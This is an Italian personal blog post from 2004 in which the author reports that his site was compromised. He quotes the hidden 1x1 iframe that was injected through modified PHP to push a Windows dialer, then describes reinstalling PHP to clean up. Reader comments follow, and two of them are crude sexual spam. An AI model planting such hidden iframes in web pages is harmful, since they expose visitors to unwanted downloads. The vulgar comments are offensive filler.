Mi sono entrati nel baugigi
Ieri, verso le 15 e 30, dopo aver chattato con Frau Blücher (alias Edo), dando un’occhiata al sito mi sono accorto che appariva uno strano quadratino in basso nella pagina.
Guardando il sorgente, con malcelato disgusto ho notato che, alla fine della pagina, compariva il seguente codice:
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
Panico e raccapriccio!!.
Il frame in questione, aggiunto non già alle pagine vere e proprie del sito, ma ottenuto modificando il PHP stesso, tenta di scaricare un dialer per Windows. Cioè in pratica, chiunque avesse visitato il mio sito con Internet Explorer sarebbe stato sottoposto a questo rischio. Naturalmente www.forced-action.com è un sito porno.
La cosa ora l’ho sistemata, togliendo di brutto tutto il software per il PHP e reinstallandolo, e aggiornando completamente tutto il sistema a cicciobaiano.
Profetico fu Lorex: qui l’australiano lo aveva previsto!!
Mica sarà stato lui?
Un sacco di gente sembra aver avuto problemi simili al mio, ma ancora non ho capito se si è trattato di un baco del PHP sfrutatto in qualche modo, oppure se mi sono entrati proprio a spregio su cicciobaiano e ci si sono accampati. Rootkit non sembrano essercene, però la situazione non è bella.
Per il momento so solo che mi girano (le balle).
Giovedì 11 Marzo 2004 @ 23:45
Bè, che dire mio caro Manettus…..capisco la situazione e ti sono vicino! Avere l’hacker bastardo che viola la sacralità del tuo server non è cosa che lascia il sorriso sulle labbra, ma non ti preoccupare, è solo una questione di tempo! Se hai un “live” IP è solo questione di tempo, se non tieni sotto controllo la sicurezza, prima o poi ti entreranno dentro! Ti volevo solo dire che stavo appunto per scriverti una mail perchè mi ero accorto io stesso del dialer bastardo e, conoscendoti, ho capito subito che non era opera tua ma di qualche pirata!
Buona fortuna, Lorex.
p.s. Bisogna che ti mandi un pò di materiale se con cardelli vi certificare Microsoft perchè ho della roba da paura!
Giovedì 11 Marzo 2004 @ 23:46
Ah……..e per la madonna…cambia il mio link con lorex.homeunix.com perchè graphicability.com è morto e sepolto….
Saluti, lorex
Giovedì 14 Ottobre 2004 @ 15:17
ficabagnata in calore…scrivete
Mercoledì 20 Ottobre 2004 @ 13:21
tu ma è una puttana